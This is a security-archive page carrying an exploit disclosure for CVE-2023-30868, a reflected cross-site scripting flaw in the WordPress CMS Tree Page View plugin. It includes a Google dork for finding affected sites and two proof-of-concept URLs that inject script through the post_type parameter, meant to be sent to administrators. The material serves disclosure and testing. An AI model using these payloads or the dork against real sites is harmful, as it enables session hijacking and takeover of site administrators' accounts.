WordPress Tree Page View 1.6.7 Cross Site Scripting

WordPress Tree Page View 1.6.7 Cross Site Scripting: Posted Jun 6, 2023; Authored by Lee Se Hyoung; WordPress Tree Page View plugin version 1.6.7 suffers from a cross site scripting vulnerability.; tags | exploit, xss; advisories | CVE-2023-30868; SHA-256 | 81cfba1089df0f7ab6bde68fbce6e6c688882e1b5137f11a580648b9886c9193; Download | Favorite | View

WordPress Tree Page View 1.6.7 Cross Site Scripting

# Exploit Title: Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/cms-tree-page-view/
# Date: 2023-04-24
# Exploit Author: LEE SE HYOUNG (hackintoanetwork)
# Vendor Homepage: https://wordpress.org/plugins/cms-tree-page-view/
# Software Link: https://downloads.wordpress.org/plugin/cms-tree-page-view.1.6.6.zip
# Category: Web Application
# Version: 1.6.7
# Tested on: Debian / WordPress 6.1.1
# CVE : CVE-2023-30868
# Reference: https://patchstack.com/database/vulnerability/cms-tree-page-view/wordpress-cms-tree-page-view-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve

# 1. Technical Description:
The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7.
This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.


# 2. Proof of Concept (PoC):

WordPress CMS Tree Page View Plugin <= 1.6.7 Cross-Site Scripting (XSS)
In the case of this vulnerability, there are two XSS PoCs available: one for version 1.6.6 and another for version 1.6.7.

1. CMS Tree Page View Plugin <= 1.6.6

  a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E.

  b.  your payload will be executed.  [!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.

2. CMS Tree Page View Plugin <= 1.6.7

  a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22+accesskey%3DC+onclick%3Djavascript%3Aalert%281%29%3B+a%3D%22.

  b. Your payload will execute the script when the user presses Ctrl + Alt + c (Mac) or Alt + Shift + c (Windows).
 [!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.

Top Authors In Last 30 Days

Red Hat 274 files
indoushka 182 files
Ubuntu 100 files
Gentoo 32 files
Debian 16 files
malvuln 13 files
Frederik Beimgraben 11 files
Chris Beiter 11 files
Matthias Deeg 11 files
Apple 10 files

File Archives

Systems

AIX (430)
Apple (2,115)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,130)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,599)
HPUX (881)
iOS (390)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,410)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,936)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,894)
UNIX (9,463)
UnixWare (188)
Windows (6,782)
Other

WordPress Tree Page View 1.6.7 Cross Site Scripting

WordPress Tree Page View 1.6.7 Cross Site Scripting

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

WordPress Tree Page View 1.6.7 Cross Site Scripting

Share This

WordPress Tree Page View 1.6.7 Cross Site Scripting

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems